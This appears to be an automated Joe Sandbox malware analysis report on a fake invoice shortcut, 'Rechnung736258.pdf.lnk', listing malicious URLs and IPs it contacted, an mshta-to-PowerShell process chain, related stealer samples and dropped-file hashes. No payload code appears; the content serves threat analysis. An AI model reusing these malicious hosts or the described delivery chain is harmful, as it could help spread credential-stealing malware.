                                                                                                                                                                                                                https://dimitricostruzioni.ch/dimitri/powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allexplorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://bugreports.qt-project.org/TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2331881203.000000006C117000.00000002.00000001.01000000.00000011.sdmp, iScrPaint.exe, 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmp, WebUI.dll.15.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://stats.itopupdate.com/multi_app_new.phpTCUINOVJ.exe, 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2554482573.000002E25D762000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.10.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://securesways.click/1explorer.exe, 00000015.00000003.2817683193.000000000311D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2780823984.000000000311D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              https://securesways.click/explorer.exe, 00000015.00000003.2767821799.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  http://crl3.digiceriScrPaint.exe, 00000010.00000002.2296475959.0000000008A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://dimitricostruzioni.ch/mshta.exe, 00000005.00000003.2665496381.000001BB90B79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2250832181.000002E24DD92000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                      104.21.16.1
                                                                                                                                                                                                                                      		securesways.clickUnited States
                                                                                                                                                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                      62.182.21.105
                                                                                                                                                                                                                                      		dimitricostruzioni.chUnited Kingdom
                                                                                                                                                                                                                                      		200083SUB6GBtrue

                                                                                                                                                                                                                                      Private

                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                                                      General Information

                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                      Analysis ID:1579308
                                                                                                                                                                                                                                      Start date and time:2024-12-21 14:58:08 +01:00
                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                      Overall analysis duration:0h 9m 37s
                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                      Sample name:Rechnung736258.pdf.lnk
                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winLNK@36/74@5/3
                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 60%
                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                      • Successful, ratio: 76%
                                                                                                                                                                                                                                      • Number of executed functions: 43
                                                                                                                                                                                                                                      • Number of non-executed functions: 58
                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                      • Found application associated with file extension: .lnk

                                                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 92.122.16.236, 23.218.208.137, 172.64.41.3, 162.159.61.3, 199.232.214.172, 18.213.11.84, 54.224.241.105, 34.237.241.83, 50.16.47.176, 23.195.39.65, 2.20.40.170, 2.19.126.149, 2.19.126.143, 172.202.163.200, 13.107.246.63, 3.219.243.226
                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                                                                                                                                                                                                                      • Execution Graph export aborted for target explorer.exe, PID 940 because there are no executed function
                                                                                                                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 5832 because there are no executed function
                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                                                      08:58:57API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                                      08:59:03API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                      08:59:03API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                                                      08:59:04API Interceptor50x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                      08:59:21API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                                                                                                                                                                      08:59:56API Interceptor8x Sleep call for process: explorer.exe modified

                                                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                                                      IPs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                      • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                                                                                                                                                      62.182.21.105KlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        bg.microsoft.map.fastly.netNavan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        Statements.pdfGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        INVOICE_2279_from_RealEyes Digital LLC (1).pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        CLOUDFLARENETUShttps://shibe-rium.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.18.18.237
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                        • 172.67.197.170
                                                                                                                                                                                                                                        finathot.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                        • 172.67.178.25
                                                                                                                                                                                                                                        Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.197.170
                                                                                                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.197.170
                                                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 172.67.164.25
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.18.185
                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.43.127
                                                                                                                                                                                                                                        jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.90.205
                                                                                                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.84.113
                                                                                                                                                                                                                                        SUB6GBKlarnaInvoice229837.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.92
                                                                                                                                                                                                                                        http://cmax.co.uk/bv.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.22.52
                                                                                                                                                                                                                                        https://cmax.co.uk/bv.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.22.52
                                                                                                                                                                                                                                        https://cmax.co.uk/qw.PDFGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.22.52
                                                                                                                                                                                                                                        WSGZf4NplR.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 62.182.18.128
                                                                                                                                                                                                                                        Transitdokumente.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.20.50
                                                                                                                                                                                                                                        Transitdokumente.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.20.50
                                                                                                                                                                                                                                        KTi123tZU6Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.18.121
                                                                                                                                                                                                                                        s422uUu30YGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 185.41.12.55

                                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Fatura227Pendente576.pdf674.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        B06 Chair + Blocker.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        2BI8rJKpBa.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        dF66DKQP7u.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 104.21.16.1
                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        Oggq2dY6kx.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                        • 62.182.21.105

                                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exede7s.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          ofsetvideofre.click.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            NPKpnpi8wd.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                              Entropy (8bit):0.8307103015499986
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugc:gJjJGtpTq2yv1AuNZRY3diu8iBVqFm
                                                                                                                                                                                                                                              MD5:AFCFD726B78897ACD9B959A309F3B751
                                                                                                                                                                                                                                              SHA1:E69B37106E4E5F6A011009CF04940D40BA3933A1
                                                                                                                                                                                                                                              SHA-256:0463A93993D7C3CF0626390873CFCD37EBE079979DF15467C803974A09A2D637
                                                                                                                                                                                                                                              SHA-512:CC38347AE3C88AB150B917A188AA635AA5B0251FDB9727AC1DDF41E0EEE10FBB296FD5ACCD9D0812B534B25EFA468C08BF36B907F0A8D11F4789F428D90A9218
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb97b0ed3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                              Entropy (8bit):0.6586092532711962
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:DvdSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/T:Dvdaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                                                              MD5:C0836BE5CC4BCA031BEA61A8CA732AB7
                                                                                                                                                                                                                                              SHA1:B24E33DADC6C9DFB8AC66DE76D118C5696C31A65
                                                                                                                                                                                                                                              SHA-256:7D80C02FFDAB265391625B5734EEF813AD8E9310E4D1618E6C29212E2A44A518
                                                                                                                                                                                                                                              SHA-512:B9B2FC7B4FD8A794F60AB3A404F763E180CFCCD47AF42959379C70822369C2DDCB0F23A58C71AA17F338373A7F23F66ECA182788DF93C52D28F73FC08160FBC2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.{..... ...............X\...;...{......................0.z..........{...;...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................I...;...|.......................;...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                              Entropy (8bit):0.07886351023241178
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TlEYeRxb1GkGuAJkhvekl1UpbZy/tallrekGltll/SPj:2zRJHrxlqpMIJe3l
                                                                                                                                                                                                                                              MD5:DF1D17759EE30601F49BF05143A9ED95
                                                                                                                                                                                                                                              SHA1:33AC197A48274EA91B15F6CA42ACF813CBAFE59C
                                                                                                                                                                                                                                              SHA-256:E2F36EE771F7E48AD478634346C050ED1B87C006D4FDAF74851A904D4390EFB2
                                                                                                                                                                                                                                              SHA-512:C64DC7639BFC3F7DECE0C9A228BFAC6DF48A9EB81D2AA3286D5ECE6E08110BDE8A12D45288C6B5C537392B3A4CB724CF6B2D194F76491E058140FEC246C4F959
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:!..b.....................................;...{...;...|.......{...............{.......{...XL......{.......................;...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                                              Entropy (8bit):5.168078105879882
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJiqeIq2P92nKuAl9OmbnIFUt8XJi+5Zmw+XJi+TkwO92nKuAl9OmbjLJ:wfeIv4HAahFUt8Xj5/+XjT5LHAaSJ
                                                                                                                                                                                                                                              MD5:FE5545087F19A313022F4E76544D5DA8
                                                                                                                                                                                                                                              SHA1:16ADD50C70F9C31941799123FDCA5E3792EB1A7E
                                                                                                                                                                                                                                              SHA-256:86F7355CA99022C7E3AC5C729C3F37FE013277185A1333A9C8D621352D269B2B
                                                                                                                                                                                                                                              SHA-512:B1E99A04CDD7009BE9B65A2CF6105A480EDEE49A1F6DA167D7197BBCFB40131F697F491E9171090A5C9172A87BED86794A1197C97E999ED92D192690CCEF46D3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.519 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-08:59:10.521 1ca4 Recovering log #3.2024/12/21-08:59:10.521 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                                              Entropy (8bit):5.168078105879882
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJiqeIq2P92nKuAl9OmbnIFUt8XJi+5Zmw+XJi+TkwO92nKuAl9OmbjLJ:wfeIv4HAahFUt8Xj5/+XjT5LHAaSJ
                                                                                                                                                                                                                                              MD5:FE5545087F19A313022F4E76544D5DA8
                                                                                                                                                                                                                                              SHA1:16ADD50C70F9C31941799123FDCA5E3792EB1A7E
                                                                                                                                                                                                                                              SHA-256:86F7355CA99022C7E3AC5C729C3F37FE013277185A1333A9C8D621352D269B2B
                                                                                                                                                                                                                                              SHA-512:B1E99A04CDD7009BE9B65A2CF6105A480EDEE49A1F6DA167D7197BBCFB40131F697F491E9171090A5C9172A87BED86794A1197C97E999ED92D192690CCEF46D3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.519 1ca4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/21-08:59:10.521 1ca4 Recovering log #3.2024/12/21-08:59:10.521 1ca4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                                                              Entropy (8bit):5.198458215989833
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJi7QL+q2P92nKuAl9Ombzo2jMGIFUt8XJieQG1Zmw+XJieQQLVkwO92nKuAl9OU:w7yv4HAa8uFUt8X75/+X7FR5LHAa8RJ
                                                                                                                                                                                                                                              MD5:1DA05BB9973030BF78A6E3144EADAB49
                                                                                                                                                                                                                                              SHA1:36FF6B6D70811698E3B03BCA109A2AC124A2B6E7
                                                                                                                                                                                                                                              SHA-256:649A5351DBFB8002D8D0A5880BD9E024C7349CA97012F7E63BE4F8DFBF84D10E
                                                                                                                                                                                                                                              SHA-512:4286C22AD10D69277EBCA09F192CE0DFB92111361EB9417D7C02965E5F1C39FF64F8C223556C7FDDD541123B8CC6923B24BBD7C816FD727525406037AEF292D3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.566 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-08:59:10.568 1d18 Recovering log #3.2024/12/21-08:59:10.568 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
